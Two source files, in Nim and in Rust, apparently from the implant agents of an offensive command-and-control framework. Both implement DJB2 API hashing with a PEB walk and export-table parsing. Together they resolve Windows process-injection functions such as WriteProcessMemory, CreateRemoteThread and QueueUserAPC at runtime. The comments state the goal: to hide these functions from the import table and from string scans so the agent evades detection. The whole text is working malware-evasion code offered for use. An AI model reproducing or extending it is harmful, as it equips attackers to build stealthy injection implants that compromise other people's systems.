File: agents/agent-nim/api_hash.nim
## api_hash.nim — IAT-free Win32 resolution via DJB2 + PEB walk (x64 Windows only).
##
## Functions are resolved at runtime by walking the PEB's InLoadOrderModuleList
## and scanning each DLL's export table.  No GetProcAddress, no LoadLibrary
## strings, no IAT entries for any function in gApi.
##
## Call initApi() once at startup (before applyEvasion) to populate gApi, then
## use the call* templates in place of winim's direct bindings.

when defined(windows):
  import winim/lean

  # ── Compile-time DJB2 hash helpers (strings are eliminated from the binary) ─

  func ctHashFn(s: string): uint32 {.compileTime.} =
    ## DJB2 addition variant, case-sensitive (for export table names).
    result = 5381u32
    for c in s:
      result = result * 33u32 + uint32(ord(c))

  func ctHashDll(s: string): uint32 {.compileTime.} =
    ## DJB2 addition variant, case-insensitive (for PEB DLL wide-char names).
    result = 5381u32
    for c in s:
      let b = uint32(ord(c))
      let lo = if b >= 65u32 and b <= 90u32: b + 32u32 else: b
      result = result * 33u32 + lo

  # Compile-time constants — function name hash values
  const
    H_VirtualAlloc        = ctHashFn("VirtualAlloc")
    H_VirtualAllocEx      = ctHashFn("VirtualAllocEx")
    H_VirtualProtect      = ctHashFn("VirtualProtect")
    H_VirtualProtectEx    = ctHashFn("VirtualProtectEx")
    H_VirtualFree         = ctHashFn("VirtualFree")
    H_WriteProcessMemory  = ctHashFn("WriteProcessMemory")
    H_ReadProcessMemory   = ctHashFn("ReadProcessMemory")
    H_CreateRemoteThread  = ctHashFn("CreateRemoteThread")
    H_OpenProcess         = ctHashFn("OpenProcess")
    H_OpenThread          = ctHashFn("OpenThread")
    H_SuspendThread       = ctHashFn("SuspendThread")
    H_ResumeThread        = ctHashFn("ResumeThread")
    H_GetThreadContext    = ctHashFn("GetThreadContext")
    H_SetThreadContext    = ctHashFn("SetThreadContext")
    H_QueueUserAPC        = ctHashFn("QueueUserAPC")
    H_CreateThread        = ctHashFn("CreateThread")
    H_WaitForSingleObject = ctHashFn("WaitForSingleObject")
    H_CloseHandle         = ctHashFn("CloseHandle")
    H_TerminateProcess    = ctHashFn("TerminateProcess")
    H_CreateProcessW      = ctHashFn("CreateProcessW")
    H_LoadLibraryA        = ctHashFn("LoadLibraryA")
    H_GetProcAddress      = ctHashFn("GetProcAddress")

  # ── Runtime DJB2 — used in export table scan ─────────────────────────────────

  proc djb2CStr(p: ptr byte): uint32 {.inline.} =
    ## DJB2 of null-terminated ASCII string (case-sensitive).
    result = 5381u32
    var arr = cast[ptr UncheckedArray[byte]](p)
    var i = 0
    while arr[i] != 0:
      result = result * 33u32 + arr[i].uint32
      inc i

  proc djb2WideHashLower(buf: ptr uint16; lenBytes: uint32): uint32 {.inline.} =
    ## DJB2 of a wide-string buffer, lowercased (takes low byte of each WCHAR).
    ## Used to hash DLL names from PEB's BaseDllName.{Buffer,Length}.
    result = 5381u32
    let nChars = lenBytes div 2u32
    let arr = cast[ptr UncheckedArray[uint16]](buf)
    for i in 0u32 ..< nChars:
      let lo = uint8(arr[i] and 0xFF'u16)
      let c  = if lo >= 65u8 and lo <= 90u8: lo + 32u8 else: lo
      result = result * 33u32 + c.uint32

  # ── PEB access via gs:[0x60] — no IAT entry, no external call ───────────────

  proc getPEB(): pointer {.asmNoStackFrame.} =
    ## Read the PEB pointer from TEB.ProcessEnvironmentBlock (GS:[0x60]).
    ## Uses Intel syntax via GAS directive; works with x86_64-w64-mingw32-gcc.
    asm """
      .intel_syntax noprefix
      mov rax, qword ptr gs:[0x60]
      ret
      .att_syntax prefix
    """

  # ── Export table scanner ─────────────────────────────────────────────────────
  #
  # PE32+ (x64) offsets used:
  #   base + 0x3C        = e_lfanew
  #   nt  + 0x00         = Signature (4 bytes, must be 0x00004550)
  #   nt  + 0x88         = DataDirectory[0].VirtualAddress  (export dir RVA)
  #   nt  + 0x8C         = DataDirectory[0].Size
  #   exp + 0x18         = NumberOfNames
  #   exp + 0x1C         = AddressOfFunctions RVA
  #   exp + 0x20         = AddressOfNames RVA
  #   exp + 0x24         = AddressOfNameOrdinals RVA

  proc resolveExport(base: uint; fnHash: uint32): uint =
    ## Scan one PE image's export table for fnHash.
    ## Returns the function VA, or 0 if not found / all matches are forwarders.
    result = 0
    if base == 0: return
    if cast[ptr uint16](base)[] != 0x5A4D'u16: return   # DOS magic
    let eLfaNew = cast[ptr uint32](base + 0x3C'u)[].uint
    let nt = base + eLfaNew
    if cast[ptr uint32](nt)[] != 0x0000_4550'u32: return  # PE sig
    # DataDirectory[0].VirtualAddress for PE32+ (x64) is at NT+0x88
    let expRVA  = cast[ptr uint32](nt + 0x88'u)[].uint
    if expRVA == 0: return
    let expSize = cast[ptr uint32](nt + 0x8C'u)[].uint
    let exp     = base + expRVA
    let numNames   = cast[ptr uint32](exp + 0x18'u)[].uint
    let fnArrRVA   = cast[ptr uint32](exp + 0x1C'u)[].uint
    let nameArrRVA = cast[ptr uint32](exp + 0x20'u)[].uint
    let ordArrRVA  = cast[ptr uint32](exp + 0x24'u)[].uint
    if fnArrRVA == 0 or nameArrRVA == 0 or ordArrRVA == 0: return
    let fnArr   = base + fnArrRVA
    let nameArr = base + nameArrRVA
    let ordArr  = base + ordArrRVA
    for i in 0u ..< numNames:
      let nameRVA = cast[ptr uint32](nameArr + i * 4'u)[].uint
      let h = djb2CStr(cast[ptr byte](base + nameRVA))
      if h != fnHash: continue
      let ord   = cast[ptr uint16](ordArr + i * 2'u)[].uint
      let fnRVA = cast[ptr uint32](fnArr + ord * 4'u)[].uint
      # Forwarder check: RVA inside the export directory itself → skip
      if fnRVA >= expRVA and fnRVA < expRVA + expSize: continue
      return base + fnRVA
    return 0

  # ── PEB walk — resolves any function by scanning all loaded modules ──────────
  #
  # Walking ALL modules (not just kernel32) handles kernel32→kernelbase
  # forwarders transparently: resolveExport skips forwarder entries, so the
  # loop naturally reaches kernelbase and finds the real implementation.
  #
  # LDR_DATA_TABLE_ENTRY offsets (x64):
  #   +0x00 InLoadOrderLinks.Flink   (LIST_ENTRY.Flink, next entry pointer)
  #   +0x30 DllBase
  #   +0x58 BaseDllName.Length  (USHORT, byte count of wide string)
  #   +0x60 BaseDllName.Buffer  (PWSTR)

  proc pebResolve*(fnHash: uint32): pointer =
    ## Find function by hash, scanning all PEB-loaded modules.
    ## No IAT entry generated; no GetProcAddress call.
    let peb = getPEB()
    if peb == nil: return nil
    let ldr = cast[ptr uint](cast[uint](peb) + 0x18'u)[]
    if ldr == 0: return nil
    let listHead = ldr + 0x10'u
    var flink = cast[ptr uint](listHead)[]
    while flink != 0 and flink != listHead:
      let dllBase = cast[ptr uint](flink + 0x30'u)[]
      if dllBase != 0:
        let res = resolveExport(dllBase, fnHash)
        if res != 0: return cast[pointer](res)
      flink = cast[ptr uint](flink)[]
    return nil

  proc pebGetModule*(dllHash: uint32): pointer =
    ## Find a DLL base address by case-insensitive hash of its name.
    let peb = getPEB()
    if peb == nil: return nil
    let ldr = cast[ptr uint](cast[uint](peb) + 0x18'u)[]
    if ldr == 0: return nil
    let listHead = ldr + 0x10'u
    var flink = cast[ptr uint](listHead)[]
    while flink != 0 and flink != listHead:
      let dllBase = cast[ptr uint](flink + 0x30'u)[]
      let nameLen = cast[ptr uint16](flink + 0x58'u)[]
      let nameBuf = cast[ptr uint](flink + 0x60'u)[]
      if dllBase != 0 and nameBuf != 0 and nameLen > 0:
        let h = djb2WideHashLower(cast[ptr uint16](nameBuf), nameLen.uint32)
        if h == dllHash: return cast[pointer](dllBase)
      flink = cast[ptr uint](flink)[]
    return nil

  # ── API table ─────────────────────────────────────────────────────────────────

  type ApiTable* = object
    VirtualAlloc*:        pointer
    VirtualAllocEx*:      pointer
    VirtualProtect*:      pointer
    VirtualProtectEx*:    pointer
    VirtualFree*:         pointer
    WriteProcessMemory*:  pointer
    ReadProcessMemory*:   pointer
    CreateRemoteThread*:  pointer
    OpenProcess*:         pointer
    OpenThread*:          pointer
    SuspendThread*:       pointer
    ResumeThread*:        pointer
    GetThreadContext*:    pointer
    SetThreadContext*:    pointer
    QueueUserAPC*:        pointer
    CreateThread*:        pointer
    WaitForSingleObject*: pointer
    CloseHandle*:         pointer
    TerminateProcess*:    pointer
    CreateProcessW*:      pointer
    LoadLibraryA*:        pointer
    GetProcAddress*:      pointer

  var gApi*: ApiTable

  proc initApi*() =
    ## Resolve all API function pointers via PEB walk + export table scan.
    ## Must be called once at process start before any call* template is used.
    gApi.VirtualAlloc        = pebResolve(H_VirtualAlloc)
    gApi.VirtualAllocEx      = pebResolve(H_VirtualAllocEx)
    gApi.VirtualProtect      = pebResolve(H_VirtualProtect)
    gApi.VirtualProtectEx    = pebResolve(H_VirtualProtectEx)
    gApi.VirtualFree         = pebResolve(H_VirtualFree)
    gApi.WriteProcessMemory  = pebResolve(H_WriteProcessMemory)
    gApi.ReadProcessMemory   = pebResolve(H_ReadProcessMemory)
    gApi.CreateRemoteThread  = pebResolve(H_CreateRemoteThread)
    gApi.OpenProcess         = pebResolve(H_OpenProcess)
    gApi.OpenThread          = pebResolve(H_OpenThread)
    gApi.SuspendThread       = pebResolve(H_SuspendThread)
    gApi.ResumeThread        = pebResolve(H_ResumeThread)
    gApi.GetThreadContext    = pebResolve(H_GetThreadContext)
    gApi.SetThreadContext    = pebResolve(H_SetThreadContext)
    gApi.QueueUserAPC        = pebResolve(H_QueueUserAPC)
    gApi.CreateThread        = pebResolve(H_CreateThread)
    gApi.WaitForSingleObject = pebResolve(H_WaitForSingleObject)
    gApi.CloseHandle         = pebResolve(H_CloseHandle)
    gApi.TerminateProcess    = pebResolve(H_TerminateProcess)
    gApi.CreateProcessW      = pebResolve(H_CreateProcessW)
    gApi.LoadLibraryA        = pebResolve(H_LoadLibraryA)
    gApi.GetProcAddress      = pebResolve(H_GetProcAddress)

  # ── Typed call templates ──────────────────────────────────────────────────────
  #
  # Each template casts gApi.<Fn> to the correct stdcall proc type and calls it.
  # Using the template at the call site generates no IAT entry for the function.

  template callVirtualAlloc*(lpAddress: LPVOID; dwSize: SIZE_T;
                              flAllocType, flProtect: DWORD): LPVOID =
    cast[proc(a: LPVOID; b: SIZE_T; c, d: DWORD): LPVOID {.stdcall.}](
      gApi.VirtualAlloc)(lpAddress, dwSize, flAllocType, flProtect)

  template callVirtualAllocEx*(hProcess: HANDLE; lpAddress: LPVOID;
                                dwSize: SIZE_T;
                                flAllocType, flProtect: DWORD): LPVOID =
    cast[proc(a: HANDLE; b: LPVOID; c: SIZE_T; d, e: DWORD): LPVOID {.stdcall.}](
      gApi.VirtualAllocEx)(hProcess, lpAddress, dwSize, flAllocType, flProtect)

  template callVirtualProtect*(lpAddress: LPVOID; dwSize: SIZE_T;
                                flNewProtect: DWORD;
                                lpOldProtect: PDWORD): WINBOOL =
    cast[proc(a: LPVOID; b: SIZE_T; c: DWORD; d: PDWORD): WINBOOL {.stdcall.}](
      gApi.VirtualProtect)(lpAddress, dwSize, flNewProtect, lpOldProtect)

  template callVirtualProtectEx*(hProcess: HANDLE; lpAddress: LPVOID;
                                  dwSize: SIZE_T; flNewProtect: DWORD;
                                  lpOldProtect: PDWORD): WINBOOL =
    cast[proc(a: HANDLE; b: LPVOID; c: SIZE_T; d: DWORD; e: PDWORD): WINBOOL {.stdcall.}](
      gApi.VirtualProtectEx)(hProcess, lpAddress, dwSize, flNewProtect, lpOldProtect)

  template callVirtualFree*(lpAddress: LPVOID; dwSize: SIZE_T;
                             dwFreeType: DWORD): WINBOOL =
    cast[proc(a: LPVOID; b: SIZE_T; c: DWORD): WINBOOL {.stdcall.}](
      gApi.VirtualFree)(lpAddress, dwSize, dwFreeType)

  template callWriteProcessMemory*(hProcess: HANDLE; lpBase: LPVOID;
                                   lpBuf: LPCVOID; nSize: SIZE_T;
                                   lpWritten: ptr SIZE_T): WINBOOL =
    cast[proc(a: HANDLE; b: LPVOID; c: LPCVOID; d: SIZE_T;
              e: ptr SIZE_T): WINBOOL {.stdcall.}](
      gApi.WriteProcessMemory)(hProcess, lpBase, lpBuf, nSize, lpWritten)

  template callReadProcessMemory*(hProcess: HANDLE; lpBase: LPCVOID;
                                  lpBuf: LPVOID; nSize: SIZE_T;
                                  lpRead: ptr SIZE_T): WINBOOL =
    cast[proc(a: HANDLE; b: LPCVOID; c: LPVOID; d: SIZE_T;
              e: ptr SIZE_T): WINBOOL {.stdcall.}](
      gApi.ReadProcessMemory)(hProcess, lpBase, lpBuf, nSize, lpRead)

  template callCreateRemoteThread*(hProcess: HANDLE; lpSec: LPSECURITY_ATTRIBUTES;
                                   dwStack: SIZE_T; lpStart: LPVOID;
                                   lpParam: LPVOID; dwFlags: DWORD;
                                   lpTid: LPDWORD): HANDLE =
    cast[proc(a: HANDLE; b: LPSECURITY_ATTRIBUTES; c: SIZE_T;
              d, e: LPVOID; f: DWORD; g: LPDWORD): HANDLE {.stdcall.}](
      gApi.CreateRemoteThread)(hProcess, lpSec, dwStack, lpStart, lpParam,
                               dwFlags, lpTid)

  template callOpenProcess*(dwAccess: DWORD; bInherit: WINBOOL;
                            dwPid: DWORD): HANDLE =
    cast[proc(a: DWORD; b: WINBOOL; c: DWORD): HANDLE {.stdcall.}](
      gApi.OpenProcess)(dwAccess, bInherit, dwPid)

  template callOpenThread*(dwAccess: DWORD; bInherit: WINBOOL;
                           dwTid: DWORD): HANDLE =
    cast[proc(a: DWORD; b: WINBOOL; c: DWORD): HANDLE {.stdcall.}](
      gApi.OpenThread)(dwAccess, bInherit, dwTid)

  template callSuspendThread*(hThread: HANDLE): DWORD =
    cast[proc(a: HANDLE): DWORD {.stdcall.}](gApi.SuspendThread)(hThread)

  template callResumeThread*(hThread: HANDLE): DWORD =
    cast[proc(a: HANDLE): DWORD {.stdcall.}](gApi.ResumeThread)(hThread)

  template callGetThreadContext*(hThread: HANDLE; lpCtx: LPCONTEXT): WINBOOL =
    cast[proc(a: HANDLE; b: LPCONTEXT): WINBOOL {.stdcall.}](
      gApi.GetThreadContext)(hThread, lpCtx)

  template callSetThreadContext*(hThread: HANDLE; lpCtx: LPCONTEXT): WINBOOL =
    cast[proc(a: HANDLE; b: LPCONTEXT): WINBOOL {.stdcall.}](
      gApi.SetThreadContext)(hThread, lpCtx)

  template callQueueUserAPC*(pfnAPC: LPVOID; hThread: HANDLE;
                             dwData: ULONG_PTR): DWORD =
    cast[proc(a: LPVOID; b: HANDLE; c: ULONG_PTR): DWORD {.stdcall.}](
      gApi.QueueUserAPC)(pfnAPC, hThread, dwData)

  template callCreateThread*(lpSec: LPSECURITY_ATTRIBUTES; dwStack: SIZE_T;
                             lpStart: LPVOID; lpParam: LPVOID;
                             dwFlags: DWORD; lpTid: LPDWORD): HANDLE =
    cast[proc(a: LPSECURITY_ATTRIBUTES; b: SIZE_T; c, d: LPVOID;
              e: DWORD; f: LPDWORD): HANDLE {.stdcall.}](
      gApi.CreateThread)(lpSec, dwStack, lpStart, lpParam, dwFlags, lpTid)

  template callWaitForSingleObject*(hHandle: HANDLE; dwMs: DWORD): DWORD =
    cast[proc(a: HANDLE; b: DWORD): DWORD {.stdcall.}](
      gApi.WaitForSingleObject)(hHandle, dwMs)

  template callCloseHandle*(hObject: HANDLE): WINBOOL =
    cast[proc(a: HANDLE): WINBOOL {.stdcall.}](gApi.CloseHandle)(hObject)

  template callTerminateProcess*(hProcess: HANDLE; uExitCode: UINT): WINBOOL =
    cast[proc(a: HANDLE; b: UINT): WINBOOL {.stdcall.}](
      gApi.TerminateProcess)(hProcess, uExitCode)

  template callCreateProcessW*(lpApp: LPCWSTR; lpCmd: LPWSTR;
                               lpProcAttr, lpThreadAttr: LPSECURITY_ATTRIBUTES;
                               bInherit: WINBOOL; dwFlags: DWORD;
                               lpEnv, lpDir: LPVOID;
                               lpSi: LPSTARTUPINFOW;
                               lpPi: LPPROCESS_INFORMATION): WINBOOL =
    cast[proc(a: LPCWSTR; b: LPWSTR; c, d: LPSECURITY_ATTRIBUTES;
              e: WINBOOL; f: DWORD; g, h: LPVOID;
              i: LPSTARTUPINFOW; j: LPPROCESS_INFORMATION): WINBOOL {.stdcall.}](
      gApi.CreateProcessW)(lpApp, lpCmd, lpProcAttr, lpThreadAttr, bInherit,
                           dwFlags, lpEnv, lpDir, lpSi, lpPi)

File: agents/agent-rust/src/api_hash.rs
//! API hashing via PEB walk + DJB2.
//! Sensitive injection functions are resolved at runtime — they never appear in the binary's IAT.

use std::sync::OnceLock;

// ── DJB2 hash (compile-time for function names, runtime for wide DLL names) ──

const fn djb2(s: &[u8]) -> u32 {
    let mut h: u32 = 5381;
    let mut i = 0;
    while i < s.len() {
        h = h.wrapping_mul(33).wrapping_add(s[i] as u32);
        i += 1;
    }
    h
}

const fn djb2_lower(s: &[u8]) -> u32 {
    let mut h: u32 = 5381;
    let mut i = 0;
    while i < s.len() {
        let b = s[i];
        let c = if b >= b'A' && b <= b'Z' { b + 32 } else { b };
        h = h.wrapping_mul(33).wrapping_add(c as u32);
        i += 1;
    }
    h
}

// Module name hashes (case-insensitive, matches PEB wide-char DLL names)
const H_KERNEL32:  u32 = djb2_lower(b"kernel32.dll");
#[allow(dead_code)]
const H_NTDLL:     u32 = djb2_lower(b"ntdll.dll");

// Function name hashes (exact case — export table names are case-sensitive)
const H_OPEN_PROCESS:           u32 = djb2(b"OpenProcess");
const H_VIRTUAL_ALLOC_EX:       u32 = djb2(b"VirtualAllocEx");
const H_VIRTUAL_PROTECT_EX:     u32 = djb2(b"VirtualProtectEx");
const H_WRITE_PROCESS_MEMORY:   u32 = djb2(b"WriteProcessMemory");
const H_READ_PROCESS_MEMORY:    u32 = djb2(b"ReadProcessMemory");
const H_CREATE_REMOTE_THREAD:   u32 = djb2(b"CreateRemoteThread");
const H_WAIT_FOR_SINGLE_OBJECT: u32 = djb2(b"WaitForSingleObject");
const H_CLOSE_HANDLE:           u32 = djb2(b"CloseHandle");
const H_CREATE_THREAD:          u32 = djb2(b"CreateThread");
const H_VIRTUAL_ALLOC:          u32 = djb2(b"VirtualAlloc");
const H_VIRTUAL_PROTECT:        u32 = djb2(b"VirtualProtect");
const H_OPEN_THREAD:            u32 = djb2(b"OpenThread");
const H_SUSPEND_THREAD:         u32 = djb2(b"SuspendThread");
const H_RESUME_THREAD:          u32 = djb2(b"ResumeThread");
const H_GET_THREAD_CONTEXT:     u32 = djb2(b"GetThreadContext");
const H_SET_THREAD_CONTEXT:     u32 = djb2(b"SetThreadContext");
const H_QUEUE_USER_APC:         u32 = djb2(b"QueueUserAPC");
const H_TERMINATE_PROCESS:      u32 = djb2(b"TerminateProcess");
const H_CREATE_PROCESS_W:       u32 = djb2(b"CreateProcessW");
const H_LOAD_LIBRARY_A:         u32 = djb2(b"LoadLibraryA");
const H_GET_PROC_ADDRESS:       u32 = djb2(b"GetProcAddress");

// ── API table ────────────────────────────────────────────────────────────────

pub struct ApiTable {
    open_process:           usize,
    virtual_alloc_ex:       usize,
    virtual_protect_ex:     usize,
    write_process_memory:   usize,
    read_process_memory:    usize,
    create_remote_thread:   usize,
    wait_for_single_object: usize,
    close_handle:           usize,
    create_thread:          usize,
    virtual_alloc:          usize,
    virtual_protect:        usize,
    open_thread:            usize,
    suspend_thread:         usize,
    resume_thread:          usize,
    get_thread_context:     usize,
    set_thread_context:     usize,
    queue_user_apc:         usize,
    terminate_process:      usize,
    create_process_w:       usize,
    load_library_a:         usize,
    get_proc_address:       usize,
}

impl ApiTable {
    pub unsafe fn open_process(&self, access: u32, inherit: i32, pid: u32) -> isize {
        let f: unsafe extern "system" fn(u32, i32, u32) -> isize = std::mem::transmute(self.open_process);
        f(access, inherit, pid)
    }
    pub unsafe fn virtual_alloc_ex(&self, proc: isize, addr: *const core::ffi::c_void, sz: usize, alloc: u32, prot: u32) -> *mut core::ffi::c_void {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void, usize, u32, u32) -> *mut core::ffi::c_void = std::mem::transmute(self.virtual_alloc_ex);
        f(proc, addr, sz, alloc, prot)
    }
    pub unsafe fn virtual_protect_ex(&self, proc: isize, addr: *const core::ffi::c_void, sz: usize, new_prot: u32, old_prot: *mut u32) -> i32 {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void, usize, u32, *mut u32) -> i32 = std::mem::transmute(self.virtual_protect_ex);
        f(proc, addr, sz, new_prot, old_prot)
    }
    pub unsafe fn write_process_memory(&self, proc: isize, base: *const core::ffi::c_void, buf: *const core::ffi::c_void, sz: usize, written: *mut usize) -> i32 {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void, *const core::ffi::c_void, usize, *mut usize) -> i32 = std::mem::transmute(self.write_process_memory);
        f(proc, base, buf, sz, written)
    }
    pub unsafe fn read_process_memory(&self, proc: isize, base: *const core::ffi::c_void, buf: *mut core::ffi::c_void, sz: usize, read: *mut usize) -> i32 {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void, *mut core::ffi::c_void, usize, *mut usize) -> i32 = std::mem::transmute(self.read_process_memory);
        f(proc, base, buf, sz, read)
    }
    pub unsafe fn create_remote_thread(&self, proc: isize, sec: *const core::ffi::c_void, stack_sz: usize, start: *const core::ffi::c_void, param: *const core::ffi::c_void, flags: u32, tid: *mut u32) -> isize {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void, usize, *const core::ffi::c_void, *const core::ffi::c_void, u32, *mut u32) -> isize = std::mem::transmute(self.create_remote_thread);
        f(proc, sec, stack_sz, start, param, flags, tid)
    }
    pub unsafe fn wait_for_single_object(&self, handle: isize, ms: u32) -> u32 {
        let f: unsafe extern "system" fn(isize, u32) -> u32 = std::mem::transmute(self.wait_for_single_object);
        f(handle, ms)
    }
    pub unsafe fn close_handle(&self, handle: isize) -> i32 {
        let f: unsafe extern "system" fn(isize) -> i32 = std::mem::transmute(self.close_handle);
        f(handle)
    }
    pub unsafe fn create_thread(&self, sec: *const core::ffi::c_void, stack: usize, start: *const core::ffi::c_void, param: *const core::ffi::c_void, flags: u32, tid: *mut u32) -> isize {
        let f: unsafe extern "system" fn(*const core::ffi::c_void, usize, *const core::ffi::c_void, *const core::ffi::c_void, u32, *mut u32) -> isize = std::mem::transmute(self.create_thread);
        f(sec, stack, start, param, flags, tid)
    }
    pub unsafe fn virtual_alloc(&self, addr: *const core::ffi::c_void, sz: usize, alloc: u32, prot: u32) -> *mut core::ffi::c_void {
        let f: unsafe extern "system" fn(*const core::ffi::c_void, usize, u32, u32) -> *mut core::ffi::c_void = std::mem::transmute(self.virtual_alloc);
        f(addr, sz, alloc, prot)
    }
    pub unsafe fn virtual_protect(&self, addr: *const core::ffi::c_void, sz: usize, new_prot: u32, old_prot: *mut u32) -> i32 {
        let f: unsafe extern "system" fn(*const core::ffi::c_void, usize, u32, *mut u32) -> i32 = std::mem::transmute(self.virtual_protect);
        f(addr, sz, new_prot, old_prot)
    }
    pub unsafe fn open_thread(&self, access: u32, inherit: i32, tid: u32) -> isize {
        let f: unsafe extern "system" fn(u32, i32, u32) -> isize = std::mem::transmute(self.open_thread);
        f(access, inherit, tid)
    }
    pub unsafe fn suspend_thread(&self, handle: isize) -> u32 {
        let f: unsafe extern "system" fn(isize) -> u32 = std::mem::transmute(self.suspend_thread);
        f(handle)
    }
    pub unsafe fn resume_thread(&self, handle: isize) -> u32 {
        let f: unsafe extern "system" fn(isize) -> u32 = std::mem::transmute(self.resume_thread);
        f(handle)
    }
    pub unsafe fn get_thread_context(&self, handle: isize, ctx: *mut core::ffi::c_void) -> i32 {
        let f: unsafe extern "system" fn(isize, *mut core::ffi::c_void) -> i32 = std::mem::transmute(self.get_thread_context);
        f(handle, ctx)
    }
    pub unsafe fn set_thread_context(&self, handle: isize, ctx: *const core::ffi::c_void) -> i32 {
        let f: unsafe extern "system" fn(isize, *const core::ffi::c_void) -> i32 = std::mem::transmute(self.set_thread_context);
        f(handle, ctx)
    }
    pub unsafe fn queue_user_apc(&self, func: *const core::ffi::c_void, thread: isize, data: usize) -> u32 {
        let f: unsafe extern "system" fn(*const core::ffi::c_void, isize, usize) -> u32 = std::mem::transmute(self.queue_user_apc);
        f(func, thread, data)
    }
    pub unsafe fn terminate_process(&self, proc: isize, code: u32) -> i32 {
        let f: unsafe extern "system" fn(isize, u32) -> i32 = std::mem::transmute(self.terminate_process);
        f(proc, code)
    }
}

pub static API: OnceLock<ApiTable> = OnceLock::new();

pub fn init() {
    API.get_or_init(|| unsafe { resolve_all() });
}

pub fn get() -> Option<&'static ApiTable> {
    API.get()
}

// ── PEB walk ─────────────────────────────────────────────────────────────────

unsafe fn peb_get_module(dll_hash: u32) -> usize {
    let peb: usize;
    std::arch::asm!("mov {}, gs:[0x60]", out(reg) peb);
    if peb == 0 { return 0; }

    let ldr = *((peb + 0x18) as *const usize);
    if ldr == 0 { return 0; }

    let list_head = ldr + 0x10;
    let mut flink = *(list_head as *const usize);

    while flink != 0 && flink != list_head {
        // LDR_DATA_TABLE_ENTRY (x64):
        // +0x30 DllBase, +0x58 BaseDllName.Length, +0x60 BaseDllName.Buffer
        let dll_base = *((flink + 0x30) as *const usize);
        let name_len = *((flink + 0x58) as *const u16);
        let name_buf = *((flink + 0x60) as *const usize);

        if dll_base != 0 && name_buf != 0 && name_len > 0 {
            let h = hash_wide_lower(name_buf as *const u16, name_len);
            if h == dll_hash { return dll_base; }
        }
        flink = *(flink as *const usize);
    }
    0
}

fn hash_wide_lower(buf: *const u16, len_bytes: u16) -> u32 {
    let len = (len_bytes / 2) as usize;
    let mut h: u32 = 5381;
    for i in 0..len {
        let wc = unsafe { *buf.add(i) };
        let lo = (wc & 0xFF) as u8;
        let c  = if lo >= b'A' && lo <= b'Z' { lo + 32 } else { lo };
        h = h.wrapping_mul(33).wrapping_add(c as u32);
    }
    h
}

unsafe fn resolve_export(base: usize, fn_hash: u32) -> usize {
    if base == 0 { return 0; }
    if *(base as *const u16) != 0x5A4D { return 0; }
    let e_lfanew = *((base + 0x3C) as *const u32) as usize;
    let nt = base + e_lfanew;
    if *(nt as *const u32) != 0x0000_4550 { return 0; }

    // Export directory: OptionalHeader at nt+0x18, DataDirectory[0] at OptHdr+0x70 → nt+0x88
    let exp_rva = *((nt + 0x88) as *const u32) as usize;
    if exp_rva == 0 { return 0; }
    let exp = base + exp_rva;

    let num_names  = *((exp + 0x18) as *const u32) as usize;
    let fn_arr     = base + *((exp + 0x1C) as *const u32) as usize;
    let name_arr   = base + *((exp + 0x20) as *const u32) as usize;
    let ord_arr    = base + *((exp + 0x24) as *const u32) as usize;

    for i in 0..num_names {
        let name_rva = *((name_arr + i * 4) as *const u32) as usize;
        let name_ptr = (base + name_rva) as *const u8;

        let mut h: u32 = 5381;
        let mut j = 0usize;
        loop {
            let b = *name_ptr.add(j);
            if b == 0 { break; }
            h = h.wrapping_mul(33).wrapping_add(b as u32);
            j += 1;
        }

        if h == fn_hash {
            let ord    = *((ord_arr + i * 2) as *const u16) as usize;
            let fn_rva = *((fn_arr  + ord * 4) as *const u32) as usize;
            return base + fn_rva;
        }
    }
    0
}

unsafe fn resolve_all() -> ApiTable {
    let k32 = peb_get_module(H_KERNEL32);
    let r = |h| resolve_export(k32, h);

    ApiTable {
        open_process:           r(H_OPEN_PROCESS),
        virtual_alloc_ex:       r(H_VIRTUAL_ALLOC_EX),
        virtual_protect_ex:     r(H_VIRTUAL_PROTECT_EX),
        write_process_memory:   r(H_WRITE_PROCESS_MEMORY),
        read_process_memory:    r(H_READ_PROCESS_MEMORY),
        create_remote_thread:   r(H_CREATE_REMOTE_THREAD),
        wait_for_single_object: r(H_WAIT_FOR_SINGLE_OBJECT),
        close_handle:           r(H_CLOSE_HANDLE),
        create_thread:          r(H_CREATE_THREAD),
        virtual_alloc:          r(H_VIRTUAL_ALLOC),
        virtual_protect:        r(H_VIRTUAL_PROTECT),
        open_thread:            r(H_OPEN_THREAD),
        suspend_thread:         r(H_SUSPEND_THREAD),
        resume_thread:          r(H_RESUME_THREAD),
        get_thread_context:     r(H_GET_THREAD_CONTEXT),
        set_thread_context:     r(H_SET_THREAD_CONTEXT),
        queue_user_apc:         r(H_QUEUE_USER_APC),
        terminate_process:      r(H_TERMINATE_PROCESS),
        create_process_w:       r(H_CREATE_PROCESS_W),
        load_library_a:         r(H_LOAD_LIBRARY_A),
        get_proc_address:       r(H_GET_PROC_ADDRESS),
    }
}
